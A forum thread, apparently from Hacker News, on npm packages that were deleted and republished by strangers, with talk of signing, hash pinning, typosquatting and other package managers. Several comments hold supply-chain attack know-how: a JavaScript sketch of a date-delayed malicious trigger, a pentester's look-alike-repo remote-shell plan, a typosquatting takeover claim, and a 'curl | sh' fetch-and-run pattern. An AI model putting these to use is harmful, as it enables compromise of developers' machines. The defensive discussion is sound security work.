PSA: Please be cautious, because this is an excellent opportunity for malicious people to take over packages and inject malware.
Example: https://www.npmjs.com/package/duplexer3, which has 4M monthly downloads, just reappeared, published by a fresh npm user. They have published another two versions since then, so it's possible they initially republished the unchanged package but are now messing with the code.
I'm not saying it's a malicious attempt, but it might be, and it very much looks like one. Be cautious, as you might not notice if some packages your code depends on were republished with malicious code. It might take some time for npm to sort this out and restore the original packages.
I just tested, and it definitely looks like a troll / hack.
> duplexer3@1.0.1 install /Users/foo/Code/foo/node_modules/duplexer3
> echo "To every thing there is a season, and a time to every purpose under the heaven:
A time to be born, and a time to die; a time to plant, and a time to pluck up that which is planted;
A time to kill, and a time to heal; a time to break down, and a time to build up;
A time to weep, and a time to laugh; a time to mourn, and a time to dance;
A time to cast away stones, and a time to gather stones together; a time to embrace, and a time to refrain from embracing;
A time to get, and a time to lose; a time to keep, and a time to cast away;
A time to rend, and a time to sew; a time to keep silence, and a time to speak;
A time to love, and a time to hate; a time of war, and a time of peace.
A time to make use of duplexer3, and a time to be without duplexer3."
To every thing there is a season, and a time to every purpose under the heaven:
A time to be born, and a time to die; a time to plant, and a time to pluck up that which is planted;
A time to kill, and a time to heal; a time to break down, and a time to build up;
A time to weep, and a time to laugh; a time to mourn, and a time to dance;
A time to cast away stones, and a time to gather stones together; a time to embrace, and a time to refrain from embracing;
A time to get, and a time to lose; a time to keep, and a time to cast away;
A time to rend, and a time to sew; a time to keep silence, and a time to speak;
A time to love, and a time to hate; a time of war, and a time of peace.
A time to make use of duplexer3, and a time to be without duplexer3.
Not to mention, it's a Pete Seeger song; The Byrds just covered it. I may be wrong, but I think Seeger wrote it for Judy Collins to sing.
Edit: ok nope, Seeger didn’t “write” it for Collins, she’s just another one to cover it. Here they are both doing it if you’re interested: https://youtu.be/fA9e-vWjWpw
Start posting large parts of, say, the New International Version, and let me know how that goes for you.
IOW, unless it’s the King James, it is likely very much subject to take down notices. Though I’m guessing a malicious troll is much more likely to know The Byrds than they are Old Testament.
And all this is happening just after the public release of a serious exploit which allows malicious code to do all sorts of nefarious things once it is somehow installed on the target machine. Hmm.
Given that there are hints, at least, that the problems were caused by some particular developer's actions, I wonder about the security model for package-managed platforms altogether now. If I were a big cybercrime ring, the first thing I'd do would be to get a bunch of thugs together and knock on the front door of the developer of a widely used package: "help us launch [the sort of attack we're seeing here] or we'll [be very upset with you] with this wrench." Is there a valid defense for a platform whose security relies on the unanimous cooperation of a widely-scattered developer base?
With cases like the current one, or the leftpad incident in 2016, I'm surprised package registries still allow recycling old package names after a package was deleted. Really seems like deleted packages should be frozen forever - if the original author never recreates it or transfers ownership, then people would have to explicitly choose to move to some new fork with a new id.
But your point about pressuring or bribing package authors still stands as a scary issue. Similar things have already happened: for example, Kite quietly buying code-editor plugins from their original authors and then adding code some consider spyware (see https://news.ycombinator.com/item?id=14902630). I believe there were cases where a similar thing happened with some Chrome extensions too...
> With cases like the current one, or the leftpad incident in 2016, I'm surprised package registries still allow recycling old package names after a package was deleted.
CPAN requires the old author to explicitly transfer or mark it abandoned-and-available-to-new-owner.
For all the things wrong with perl5 (and I love it dearly, but I have spent enough time with it that I can probably list more things wrong with it than the people who hate it ;) it's always a trifle depressing to watch other ecosystems failing to steal the things we got right.
This happens all the time. The new generation creates something cool because what our parents created isn't cool any more, only to fail in exactly the same spot as our parents did. Only, it was already solved in the parents' last version.
This goes for clothing design, cars, houses, kitchenware and so on, as well as software.
Just look at the microwave oven earlier...
Modern microwave ovens have all adopted impractical and quirky new UIs, when the old concept of knobs was simple and worked fairly well in the first place.
My oldest one was just two dials. The second one, 15 years old, had loads of buttons and stuff, really stupidly spread out: you had to press watts, minutes, seconds, then start, and start was not in a corner, not in the top or bottom row, nor any other logical place, so you had to search for it every time. I glued a rubber piece to it so I could find it again without having to bend down and search.
Since then I have made sure the microwave has two dials, one for time, one for power.
Remember the electric kettle that had just an on/off switch?
Then came one with an option button for 80 or 100 degrees (176 or 212, in freedom units). I never knew I needed that, but it changed my life and I cannot do without it. Reason: 80-degree water is hot enough for my needs and saves time.
Our latest has 3 buttons with different possibilities, beeps like a maniac when ready (an option which cannot be turned off) and can do things I never knew anyone would need (like keeping the water at x degrees for y minutes).
I guess it is like evolution: you experiment, keep what works and get rid of all things unfit.
Packages / projects being frozen. AFAIR that's how SourceForge works/worked. I remember a few years back being baffled that I couldn't delete my own project.
But it makes sense, other projects might depend on it, so it's archived.
It's just npm that's broken. I've never used a package manager for any other language that had these kinds of issues. It's exacerbated by the massive over-reliance on external packages in JS too. `left-pad` really shone a light on how dependencies in JS land are brought in without too much thought.
Although, I've never considered this in the case of an actual attack. It would make sense to actually fingerprint the entire source tree and record this too somewhere, so when you build it you know you are getting the right thing. Teapot basically defers this to git.
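For what it's worth, that kind of source-tree fingerprint is cheap to roll yourself with nothing but Node's crypto and fs modules. A rough sketch (the ignore list and hash choice are just illustrative; this isn't anything npm does for you):

    // Sketch: fingerprint a source tree by hashing every file, then hashing the sorted list.
    const crypto = require('crypto');
    const fs = require('fs');
    const path = require('path');

    function hashFile(file) {
      return crypto.createHash('sha256').update(fs.readFileSync(file)).digest('hex');
    }

    function fingerprintTree(root) {
      const entries = [];
      (function walk(dir) {
        for (const name of fs.readdirSync(dir).sort()) {
          const full = path.join(dir, name);
          if (fs.statSync(full).isDirectory()) {
            if (name !== 'node_modules' && name !== '.git') walk(full); // illustrative ignore list
          } else {
            entries.push(path.relative(root, full) + ':' + hashFile(full));
          }
        }
      })(root);
      // Hashing the sorted "path:hash" lines keeps the fingerprint stable across machines.
      return crypto.createHash('sha256').update(entries.join('\n')).digest('hex');
    }

    console.log(fingerprintTree(process.argv[2] || '.'));

Record that hash next to your lockfile and compare it at build time, and you at least know the tree you're building is the tree you reviewed.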
> Is there a valid defense for a platform whose security relies on the unanimous cooperation of a widely-scattered developer base?
The defense is staged deployment and active users. This obviously depends on the bluntness of the malicious code.
If I may assume easily noticed effects of the malicious code: a dev at our place - using Java with Maven - would update the library, and his workstation would get owned. This could have impacts, but if we notice, we'd wipe that workstation, re-image from backup and get in contact with Sonatype to kill that version. This version would never touch staging, the last step before prod.
If we don't notice on the workstation, there's a good chance we or our IDS would notice trouble either on our testing servers or our staging servers, since staging in particular is similar to prod and subject to load tests similar to prod load. Once we're there, it's back to bug reports with the library and contact with Sonatype to handle that version.
If we can't notice the malicious code at all due to really, really smart activation mechanisms... well, then we're in NSA conspiracy land again.
> If we can't notice the malicious code at all due to really, really smart activation mechanisms... well, then we're in NSA conspiracy land again.
What about really dumb activation methods? E.g., a condition that only triggers malicious behavior several months after the date the package was subverted. You don't have to be the NSA to write that.
What’s scary here is that there are simpleminded attacks that, AFAIK, we don’t know how to defend against.
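To make the point concrete, here's roughly all such a trigger takes (the date and the padding function are made up; the payload is deliberately left as a comment):

    // Sketch: a trivially "dumb" time-delayed trigger. Nothing NSA-grade about it.
    const ACTIVATION_DATE = Date.parse('2018-06-01T00:00:00Z'); // months after the package was subverted

    function leftPad(str, len, ch) {
      if (Date.now() > ACTIVATION_DATE) {
        // ...the malicious payload would only start running here, long after anyone skimmed the diff
      }
      // behaves exactly like the innocent version until then
      str = String(str);
      ch = ch || ' ';
      while (str.length < len) str = ch + str;
      return str;
    }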
Mh, I have a rather aggressive stance on these kinds of incidents, no matter whether they are availability or security related. You can fish for them, you can test for them, and there are entire classes of malicious code you cannot find. For everything you do, Turing-complete code can circumvent it. There's a lot of interesting reading material in the space of malware analysis regarding sandbox detection, for example.
So stop worrying. Try to catch as much as feasible before prod. Then focus on detecting, alerting and ending the actual incident. If code causes an incident, it's probably measurable and detectable. And even then you won't be able to catch everything. As long as a server has behavior observable from the internet, it could be exfiltrating data.
Tested restores with at most 59 minutes of data loss for prod clusters within 90 minutes after order. 30ish minutes of downtime. We could even inspect binlogs for a full restore afterwards on a per-request basis for our big customers.
Sounds like good hygiene, though it seems burdensome if everyone must do it or seriously risk infection. Ideally there would be at least minimal sanity checks and a formal process before a package can be claimed by someone else.
In case anyone was considering sending him $10, no, his hypothetical code would not be running on the Google login page. Google does not pull in external dependencies willy nilly like that.
At Google scale you quite certainly want to do that, not just for security but for legal reasons. You really don't want to end up using, for example, AGPL-licensed stuff in the wrong places, and if you just blindly pull stuff with dependencies from a package manager, this could easily happen.
One of the recent True Geordie podcasts features the "YouPorn Guy" who talks about finding it near impossible to get lawyers not on a retainer from Google to fight them.
Sure, a legal audit is standard and usually much simpler than a full source audit for security, whose complexity is proportional to the project size.
I sincerely hope all modern package managers, when invoked with sudo, immediately spawn a very-low-privilege process that does most of the work sandboxed to /tmp/whatnot, and the root process just copies files to the right place and runs some system calls to update databases etc.
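In Node terms the split could look something like this sketch (the uid, paths and hook script name are all made up; no real package manager is being quoted here):

    // Sketch: run the untrusted install hooks as an unprivileged user in a scratch
    // directory, and let the root process only copy the results into place.
    const { spawnSync } = require('child_process');
    const fs = require('fs');

    const result = spawnSync('node', ['install-hooks.js'], {
      cwd: '/tmp/pkg-build',   // sandboxed working directory
      uid: 65534,              // e.g. the "nobody" user
      gid: 65534,
      stdio: 'inherit',
    });

    if (result.status === 0) {
      // Only the privileged parent touches the real install location (fs.cpSync needs Node 16.7+).
      fs.cpSync('/tmp/pkg-build/dist', '/usr/lib/some-package', { recursive: true });
    }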
Most package managers I know support Turing complete install hooks. How would a package manager detect what parts of those require/are safe to run with root?
No, that's the entire point. They need almost nothing at all but the ability to run code fast in a loop with memory calls. The entire point is that they bypass privilege checks.
I'm not sure if it would help much. That means you either have to have users be able to recognize and eyeball-validate hashes ("sure, this is left-pad-5ffc991e; that's what I want! Wait, shit, it's actually left-pad-5ffd991e, never mind; wrong package"), or you need pre-existing databases of trusted hashes (which either puts you right back at a registry a la NPM, or leaves you reliant on a package-lock.json file or similar, which doesn't cover many common use cases for secure package signing).
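To be fair, the lockfile route already gets you most of the way there: npm 5's package-lock.json records an SSRI "integrity" string per dependency, and checking a downloaded tarball against it is a few lines of crypto. A sketch (the tarball path and the assumption that the package is a top-level dependency are mine):

    // Sketch: verify a downloaded tarball against the "integrity" field in
    // package-lock.json (SSRI format, e.g. "sha512-<base64 digest>").
    const crypto = require('crypto');
    const fs = require('fs');

    function verifyTarball(tarballPath, integrity) {
      const dash = integrity.indexOf('-');
      const algorithm = integrity.slice(0, dash);   // e.g. "sha512"
      const expected = integrity.slice(dash + 1);   // base64 digest
      const actual = crypto
        .createHash(algorithm)
        .update(fs.readFileSync(tarballPath))
        .digest('base64');
      return actual === expected;
    }

    const lock = JSON.parse(fs.readFileSync('package-lock.json', 'utf8'));
    const integrity = lock.dependencies['duplexer3'].integrity; // assumes a top-level dependency
    console.log(verifyTarball('/path/to/duplexer3.tgz', integrity) ? 'OK' : 'MISMATCH');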
A detailed description of what you could do with a malicious npm package is currently on the front page: "Harvesting credit card numbers and passwords from websites"
Hey, I wrote that article :) - yes, it was pure coincidence. I just decided, with all the security stuff going on this week (Spectre/Meltdown; I hadn't heard about the npm stuff), that I'd write an article about it.
I am very surprised that a package manager of this calibre and impact abstains from best practices when it comes to authentication through code signing. Other package managers are miles ahead of NPM. For example Nix, which uses immutability and hashing so that the same sources always produce the same artifact.
So I know RPMs and debs are signed, as I've set up repos for both. Docker repositories require a valid SSL key (or you have to manually allow untrusted repos). But do Python packages and Ruby gems have signature verification? How do PyPI/pip and gem deal with validating that a package is what it claims to be?
You have a point, but we need to take into account that the technology has been around for a long time, the risks are well known and documented, and the safety concerns of most of these package managers have been raised with their maintainers.
The example in the article has come to light accidentally, but we must seriously ask ourselves how many incidents are currently unidentified.
Besides, you can use Nix for 'normal' development. It is suitable for more things than just a distro package manager.
Signing won't help unless the end user specifies the signature or certificate that they expect (signing would only help ensure package upgrades are from the same author).
If you're going to have clients specify a signature anyway, then you don't need to sign packages, you just need a strong one-way hash function, like SHA-512 or something. User executes "pkg-mgr install [package name] ae36f862..."
Either way, every tutorial using npm will become invalid.
"npm install packagename" could record the public key in package.json (or package-lock.json) on first save, and only accept installs (or upgrades) matching the same public key. Just like how android app code signing works, or similar to ssh known_hosts trust-on-first-use.
Granted it wouldn't save those adding a new package to a project the first time, but it would save the bacon of anyone re-running "npm install" in an existing project, for example during a deploy, or when trying to upgrade to a newer version of a given package.
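A rough sketch of the client side of that trust-on-first-use idea (the trusted-keys file and the fingerprinting scheme are invented for illustration; npm has nothing like this today):

    // Sketch: pin a publisher's key fingerprint on first install, ssh known_hosts style.
    const crypto = require('crypto');
    const fs = require('fs');

    const TRUST_FILE = 'trusted-keys.json'; // hypothetical file kept next to package-lock.json

    function fingerprint(publicKeyPem) {
      return crypto.createHash('sha256').update(publicKeyPem).digest('hex');
    }

    function checkPublisherKey(pkgName, publicKeyPem) {
      const store = fs.existsSync(TRUST_FILE)
        ? JSON.parse(fs.readFileSync(TRUST_FILE, 'utf8'))
        : {};
      const fp = fingerprint(publicKeyPem);

      if (!(pkgName in store)) {
        store[pkgName] = fp; // first install: pin the key
        fs.writeFileSync(TRUST_FILE, JSON.stringify(store, null, 2));
        return true;
      }
      return store[pkgName] === fp; // later installs/upgrades must match the pinned key
    }

A mismatch would mean the package is now published with a different key than the one seen on first install - exactly the duplexer3 situation.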
An independent site that maps packages to author certs, which npm uses for verification at install time?
Also, this is a problem that every package-management system faces. They alert on changes on upgrade, but there's a requirement at the end-user level to verify that, at install time, the cert being trusted is the right one.
I'm surprised there wasn't a global lock-down on new package registrations (or at least with the known names of lost packages) while they were working to restore them.
How does RubyGems handle a package being removed and replaced by a different (and maybe malicious) actor? Not allow a package to be deleted? Block the package name from being claimed by someone else?
> Once you've yanked all versions of a gem, anyone can push onto that same gem namespace and effectively take it over. This way, we kind of automate the process of taking over old gem namespaces.
Shit. That's a good point, I downloaded the Heroku CLI during the attack and it uses duplexer3. I got a weird message that seemed "off" during postinstall.
Were any of the deleted packages temporarily hijacked? It strongly seems like this was the case. If so, please confirm immediately so people who installed packages during this time can start scanning for malware.
Even if the answer is “yes, 1+ packages were hijacked by not-the-original author, but we’re still investigating if there was malware”, tell people immediately. Don’t wait a few days for your investigation and post mortem if it’s possible that some users’ systems have already been compromised.
I would also hope for and expect this to be communicated ASAP from the NPM org to its users.
@seldo, I understand that you don't want to disseminate misleading info, but an abundance of caution seems warranted in this case as my understanding of the incident lines up with what @yashap has said. If we're wrong, straighten us out --- if we're not, please sound an advisory, because this is major.
Yeah, these were some core, widely used packages that were deleted. If they were temporarily hijacked, lots of dev machines (including mine) may have been compromised. There's a major security risk here; if there was any hijacking, now is not the time for information hiding and PR.
Seems like you should have frozen publishing instead of saying, "Please do not attempt to republish packages, as this will hinder our progress in restoring them." Especially to prevent even temporary hijacking.
"How would package signing prevent people from requesting the wrong package? The malware author could also sign their package."
And here is a perfect example. Someone replaced a legit package with a malicious one. Had the original author signed the package, then NPM users could have defended against the new malicious author, because the new author's signing key would not be in their truststore.
Unsigned packages leave NPM package users defenseless. I hope that is crystal clear now.
When I was doing pentesting, we had an interesting assignment. Our job was to pop a dev project. Then we'd tell them how to secure themselves.
One of our tactics was to set up fake Github profiles with very similar names, then try to get someone internal to the team to `git clone` and run our code. Boom, remote shell.
We didn't execute the plan. But it was thrown around as an idea.
When a package on npm can disappear, and a new package can appear in its place at a later version, by a different author, and there is no connection between those two people, then you're in a bad situation. Just because no one currently runs attacks like this doesn't mean you'll be safe forever. It's worth getting ahead of this.
I don't know whether package signing is the best solution. Maybe yes, maybe no. But the question is, if a package vanishes, what is the proper action to take?
The solution seems like a rollback. Let us have the latest previous version from the same author, by default. That will fix the builds and not require any heavyweight changes.
But package signing would definitely be nice, if it can be integrated in a lightweight and chaos-free fashion.
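For the rollback idea, something like this sketch would already go a long way. It assumes the registry metadata exposes the publishing user per version (the public registry does include an `_npmUser` field in each version's manifest, but treat that as an implementation detail); the package and user names are placeholders:

    // Sketch: find the newest version of a package that was published by a trusted user.
    const https = require('https');

    function fetchPackument(name) {
      return new Promise((resolve, reject) => {
        https.get(`https://registry.npmjs.org/${name}`, (res) => {
          let body = '';
          res.on('data', (chunk) => { body += chunk; });
          res.on('end', () => resolve(JSON.parse(body)));
        }).on('error', reject);
      });
    }

    async function lastVersionByPublisher(name, trustedPublisher) {
      const packument = await fetchPackument(name);
      // Keys are roughly in publication order; real code should sort by semver instead.
      const versions = Object.keys(packument.versions).reverse();
      return versions.find((v) => {
        const user = packument.versions[v]._npmUser;
        return user && user.name === trustedPublisher;
      });
    }

    lastVersionByPublisher('duplexer3', 'original-author').then(console.log);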
Yup. Publishing to Clojars requires GPG and is a bit of a pain compared to publishing to NPM. I'd take Clojars' approach any day of the week over this nonsense, though.
Actually I'm doing him a favor ... I completely understand that people talk like that within companies. When emotions are involved, that's what happens. When you're acting in any capacity as a spokesperson for a company (or I guess a government or non-profit too), a bit more decorum is called for. It's not just him - I've been feeling this for a long time. One thing I appreciated about Obama was that he was always dignified (not that I always agreed with what he was saying). Now that the POTUS posts uncouth tweets, maybe it's okay to put statements like that in your SEC filings too.
I got down-voted for calling out some of Kalanick's frat-boy behavior and speech. I'm sure it's not popular on a site predominated by twenty-somethings but since I'm old, I'd prefer to be called old-fashioned or out-of-touch rather than simply being dismissed. If it helps ... I'm sorry that I was so blunt - I should have typed these couple of paragraphs instead.
Speaking how he spoke is exactly what the situation called for, and shaming him like this might give people the impression that the community doesn't support it. People feel differently, but for me, it was a breath of fresh air. Finally, someone talking straight with a community! "We fucked up. Report incoming." Done, A+. We can all relate.
Maybe that's not professional enough for certain circles, but hopefully this mindset will permeate to them eventually. We could all stand to loosen up a bit.
Any update on the post-mortem? How long have the binaries been replaced? Is there evidence that malware was injected into the binaries?
Additionally, you should brush up on your code signing implementations. Had you signed it with a trusted code signing cert, consumers could have verified that you produced the binaries...and not a malicious user. Assuming they didn't have access to the private key material of your code signing key.
There's a difference between people who come across or read Reddit, and those who actually post and participate on Reddit. The Average Joe is usually part of the former.
NPM is extremely vulnerable to typosquatting. Be cautious with what you install. The install scripts can execute arbitrary code. The NPM team's response is that they hope that malicious actors won't exploit this behaviour. According to my tests, typosquatting 3 popular packages allows you to take over around 200 computers in the 2 weeks it takes their moderators to notice.
That's okay, but it's not enough - it's easy to swap two letters and do similar substitutions to fool many users. If a package is downloaded 10,000 times every day, surely once in a while someone will misspell the name somehow.
Other than that, their reaction to similar incidents was to wait for somebody on Twitter to notify them, ban the responsible users, and hope that it won't happen again. It's still extremely exploitable, and there are surely many other novel ways of installing malware using the repository that we haven't even heard of yet. The NPM security team is slow to act and sadly doesn't think ahead. They're responsible for one of the largest software ecosystems in the world; they should step up their game.
They could (should?) implement edit-distance checks on all new packages against existing packages. If the name is too similar to an existing package name, it would require approval.
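A rough sketch of what that check could look like at publish time (the threshold and the hard-coded name list are placeholders; a registry would use its real index and probably weight by download counts):

    // Sketch: flag new package names that are within a small edit distance of an existing name.
    function levenshtein(a, b) {
      const dp = Array.from({ length: a.length + 1 }, (_, i) =>
        Array.from({ length: b.length + 1 }, (_, j) => (i === 0 ? j : j === 0 ? i : 0))
      );
      for (let i = 1; i <= a.length; i++) {
        for (let j = 1; j <= b.length; j++) {
          dp[i][j] = Math.min(
            dp[i - 1][j] + 1,                                   // deletion
            dp[i][j - 1] + 1,                                   // insertion
            dp[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1)  // substitution
          );
        }
      }
      return dp[a.length][b.length];
    }

    function needsReview(newName, existingNames, threshold = 2) {
      return existingNames.some(
        (name) => name !== newName && levenshtein(newName, name) <= threshold
      );
    }

    console.log(needsReview('duplexerr3', ['duplexer3', 'lodash', 'request'])); // true: hold for approval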
Javascript is a very handy language, it's held back by all the gymnastics it needs to do to get over browser/www limitations, and an influx of low skill developers with no diploma.
> it's held back by all the gymnastics it needs to do to get over browser/www limitations,
I suppose, but I think it's the javascript "nature" (dynamic typing along with the scripting style of wanting to be a "Swiss army knife" to solve all problems). Javascript, like perl and even C, gives you a lot of rope to hang yourself. And like perl and C, javascript initially seems simple and easy, and it deceives you into thinking novices know what they are doing.
> and an influx of low skill developers with no diploma.
That's true of all languages though. Plenty of incompetent developers at all levels and all languages. I don't think it's a javascript issue.
> Plenty of incompetent developers at all levels and all languages. I don't think it's a javascript issue.
While that's potentially true, I do suspect that there's a lot fewer, say, Haskell, Clojure, or Elixir developers than there are for some other languages. Not that they don't exist, but it seems unlikely that you'd cross paths with them.
There are orders of magnitude fewer developers and jobs available for those languages. I'm only not an Elixir developer because there are almost zero Elixir jobs.
Well, both versions are true, the latter mostly following from the former. With a lower absolute number of developers, the number of incompetent programmers is going to be lower in absolute terms, despite the ratio staying the same as in other languages.
But I believe there's a difference in the ratio, too, due to the way Haskell, Erlang, Lisp, etc. programmers learn these languages. Basically, they learn the languages not because someone wants them to (e.g. Java, C#, etc.) and not because they have to just to be able to do something they want to do (e.g. JavaScript, SQL, etc.). Instead, people learn such languages because they themselves want to, which makes them more likely to delve deeper, learn more and acquire more important skills.
Well, that's a conjecture I can't prove and I may be completely wrong on this, it's just what my anecdotal experience suggests.
Another part of it is that someone who's incompetent in, e.g. JavaScript, is likely to not make it very far trying to do Clojure. And, again some conjecture, I'd bet that someone who is great at Clojure would write very nice JS.
When I was learning Python back in 2006 or so, I remember someone stating "You can write Java in any language". This was referring to people who wrote Python code with these huge class hierarchies that inherited from stuff all over the place, when a "Pythonic" solution would have just involved a couple of functions.
Hey, I’ve got no diploma, just 30 years of commercial development. But even I know that all the unit tests in the world can’t paper over the flaws of a typeless scripting language.
Yikes, what is it about node/npm/javascript that makes it feel like a house of cards?
I think the (short) answer is "node, npm, and javascript".
The longer answer has something to do with the automatic installation of dependencies, and the common use of shell scripts downloaded directly off the internet and executed using the developer's or sysadmin's user account.
I used to use CPAN all the time. CPAN would check dependencies for you, but if you didn't have them already you'd get a warning and you'd have to install them yourself. It forced you to be aware of what you're installing, and it applied some pressure on CPAN authors to not go too crazy with dependencies (since they were just as annoyed by the installation process as everyone else.)
These days I use NuGet a lot. It does the dependency installation for you, but it asks for permission first. The dialogs could be better about letting you learn about the dependencies before saying they're ok. (In general, NuGet's dialogs could be a lot better about package details.)
> CPAN... forced you to be aware of what you're installing
I think CPAN is pretty sweet for variety/wide reach of packages available, but this is flat-out wrong.
CPAN is not a package manager; it is a file sprayer/script runner with a goal of dependency installation. That's perfectly sufficient for a lot of use cases, but to me "package manager" means "program that manages packages of software on my system", not the equivalent of "curl cpan.org/whatever | sh".
CPAN packages can (and do by very common convention) spray files all over the place on the target system. Then, those files are usually not tracked in a central place, so packages can't be uninstalled, packages that clobber other packages' files can't be detected, and "where did this file come from?"-type questions cannot be answered.
Whether CPAN or NPM "force you to be aware of what you're installing" seems like the least significant difference between the tools. When NPM tells you "I installed package 'foo'", it almost always means that the only changes it made to your system were in the "node_modules/foo" folder, global or not. When CPAN tells you "I installed package 'foo'", it means "I ran an install script that might have done anything, and that someone happened to name 'foo'; hope that script gave you some verbose output and told you everything it was doing! Good luck removing/undoing its changes if you decide you don't want that package!"
There are ways around all of those issues with CPAN, and plenty of tools in Perl distribution utilities to address them, but they are far from universally taken advantage of. CPAN is extremely unlike, and often inferior to, NPM. Imagine if NPM packages did all of their installation logic inside a post-install hook; that's more like a CPAN distribution.
I had very limited contact with CPAN some years ago but I imagine it was slightly more sane in terms of granularity of dependencies.
Whereas a lot of npm modules are relatively small - some tiny - and have their own dependencies. So a simple "npm install blah" command can result in dozens of packages being installed. Dealing with that manually would, in fairness, be a giant chore.
Now of course there's a discussion to be had about whether thousands of weeny little modules is a good idea or not but, to be honest, that's a religious debate I'd rather steer clear of.
CPAN has a setting that force-feeds you dependencies without asking, but I don't think it's on by default. Also, CPAN runs tests by default, which usually takes forever, so users get immediate feedback when packages go dependency-crazy. The modern Perl ecosystem is often stupidly dependency-heavy, but nothing like Node.
I have recently taken over an Angular project (with a C# backend, thankfully) at my job. It took two hours to get it to even compile correctly because some dependencies were apparently outdated in package.json and it just ran on the other dev's machine by accident. I don't understand why I need over 100 dependencies for a simple Angular Single Page App that pulls JSON from the backend and pushes JSON back. Meanwhile, the C# backend (a huge, complicated behemoth of software) ran on the first click.
Three developers on my team spent the last 4 years pushing for angular. Four years ago, I was 50/50 on it vs react, so whatever, but if my team's really for it, let's do it.
Fast forward to angular 2, and we're down to two developers who are still for it.
Fast forward to today, I'm down to one angular dev who's still for it, and two of the original three have left for react jobs. Meanwhile, I'm left with a bunch of angular 1 code that needs to be upgraded to angular 2, and a few testing-out-angular-2 projects that are dependency hell.
The only reason I ultimately embraced angular 1 to begin with (above reasons aside), was because it was so opinionated about everything, I could throw it at my weaker developers and say: "just learn the angular way to do it", and there was very little left they could meaningfully screw up. Angular proponents on the team would see it as a point of expertise to teach the "angular way" to more junior devs, and everyone left the day feeling good.
When it comes to Javascript, 95% of the difficulty with writing good, maintainable code is ensuring that your team is all writing to a very exact and consistent quality and style, since there are so many different ways you can write JS and so many potential pitfalls. And if the team all wants to embrace Google's Angular standard, that works for me. It's far easier to be able to point to an ecosystem with an explicit, opinionated way of writing code than it is to continuously train people on how to write maintainable code otherwise.
But with angular 2, if you haven't been drinking the Kool-Aid for a while now, it requires so much knowledge just to get running that I can't even have junior devs work on it without a senior dev who's also an angular fanboy there to make sure everything is set up to begin with. It's absurd. And I'm supposed to sell to the business that we need to migrate all my Angular 1 code to this monstrosity? And then spend time again every 6 months making the necessary upgrades to stay up to date? Get real.
I don't understand. We've started a new Angular 2+ project and our junior developers managed to roll into it quite easily. Our designers (who know jack about Javascript) got excited when they discovered that our project uses .scss, and the results have been spectacular.
Seriously, I REALLY REALLY don't get this hate for Angular 2+
Just wait until Angular 2 hasn't been cool for a while and you can't find any JS developers who are interested in maintaining your software rather than rewriting it in xyz_latest_fad_framework.
Kidding - but we had exactly the same problem, except with a React app rather than an Angular one just before Christmas.
No joke about this statement though: every time we have a time-consuming build issue to deal with, it comes down to some npm dependency problem. Honestly, if there were a way we could realistically ditch npm (NO! YARN IS NOT ANY BETTER - to preempt that suggestion - it's simply an npm-a-like) I'd happily do so, but sadly there isn't.
The basic explanation is that the dependencies for the angular app are much smaller, but I’m not sure which bit is confusing you. You don’t understand why an incorrectly written program required work to run when a bigger but correctly written program was easy?
In principle programs shouldn't stop working just because they are old.
Yes, no language completely realizes this. But there's a world of difference between C's "it was written only 40 years ago, why did compilers break it?" and Python's "yes, you are expected to review your code every 3 or 4 years", and there is another world of difference from that to the faster JavaScript frameworks that practice "your code is 6 weeks too old, you loser!"
This is a cultural thing, where developers will decide when to invest in developing their library against the old version and when for the new version. For stable languages like C, or distro supported packages it’s years - just check out Debian or Red Hat for an ecosystem that values stability.
Node was a very interesting thing back when it started. It was a hack, but a nice kind of hack. You could write some efficient servers with it. But then the community that formed around it, and with it the project, went berserk.
Well, kind of. Node was not conceived as a general-purpose tool initially; you would write some I/O-bound servers in it. And PHP too is not a general-purpose tool: it is for easily writing interactive web pages (in the pre-Web-2.0 sense). Though Node.js was way more thoughtfully designed. I don't know much about PHP, but there's lots of literature (see https://eev.ee/blog/2012/04/09/php-a-fractal-of-bad-design/).
I really wish that people would stop referencing that "Fractal of Bad Design" article. It's outdated and mostly irrelevant now (April 2012, PHP was at 5.4 then, it's at 7.2 now). It's not that I want to defend PHP, I just think people should judge PHP for what it is now instead of what it was several major changes ago.
Besides, the author seems to misunderstand a great many things about PHP and languages in general. Here's a short rebuttal (also from April 2012): https://blog.ircmaxell.com/2012/04/php-sucks-but-i-like-it.h... that explains some of the misunderstandings.
Hmm are you sure? I've read the fractal of bad design many times.
Some issues might be "fixed", but could they fix the actual "fractal of bad design"?
Isn't it still the mix of C-style and Java-style, the inconsistent, left-associative, horribly broken language it always was?
I always thought the bugs were anecdotal backing for the main point: PHP is a badly designed non-programming language for non-programmers, who suffer Stockholm syndrome from all the PHP abuse...
> Hmm are you sure? I've read the fractal of bad design many times.
Yeah, I'm sure. And so have I. Maybe you should stop reading it to reinforce your prejudice and instead take a look at PHP 7.2?
> non-programming language for non-programmers, who suffer Stockholm syndrome from all the PHP abuse...
Hating PHP is almost like a bad meme. Obviously it's doing something right otherwise it probably wouldn't be as popular as it is. (Same can be said for Javascript, I guess.)
Your personal feelings about the language are pretty much irrelevant. The Fractal of Bad Design article, however, is actually spreading misinformation yet people with an axe to grind keep referencing it because it fits their agenda, hence why I react whenever I see it referenced.
Here are just a couple of examples of where it's flat out wrong and/or completely outdated. There are plenty more.
He's left in things that were fixed long before he published the article — e.g. the new array syntax — but that doesn't stop him from saying stuff like "Despite that this is the language’s only data structure, there is no shortcut syntax for it; array(...) is shortcut syntax. (PHP 5.4 is bringing “literals”, [...].)" Keep in mind, 5.4 was already out when he wrote it...
Not to mention the whole section on "missing features", where he basically enumerates things that most certainly don't belong in a language's core but in separate libraries or as part of a framework, and — surprise! — those are all available in libraries, frameworks, extensions, etc.
When it's invalid, maybe. The article you link says in the first three paragraphs:
---8<---
Whether you like PHP or not, go and read the article PHP: a fractal of bad design. It's well written by someone who really knows the language which is not true for most other articles about this topic. And there are numerous facts why PHP is badly designed on many levels. There is almost no FUD so it is also a great source for someone who wants to learn PHP really well (which is kind of sad).
I am surprised that I am able to live with PHP and even like it. Maybe I am badly designed too so that I am compatible with PHP. I was able to circumvent or mitigate most problems so the language doesn't bother me.
Anyway, there are several topics which are inaccurate or I don't agree with them. Here they are with no context so they probably wouldn't make much sense without reading the original article:
Quite a few. E.g. ssh definitely was not, Rust was not, TeX was not. But these were mostly second-thought projects of the "let's now finally do everything right" kind.
The npm repository is the largest package repository in the world. A lot of the major incidents they've had could have happened to other ecosystems (e.g. PyPI allows a user to delete packages that other packages depend on), but they either haven't happened or haven't had as large an impact. When npm breaks, everyone notices, because everyone either uses npm or knows someone who does.
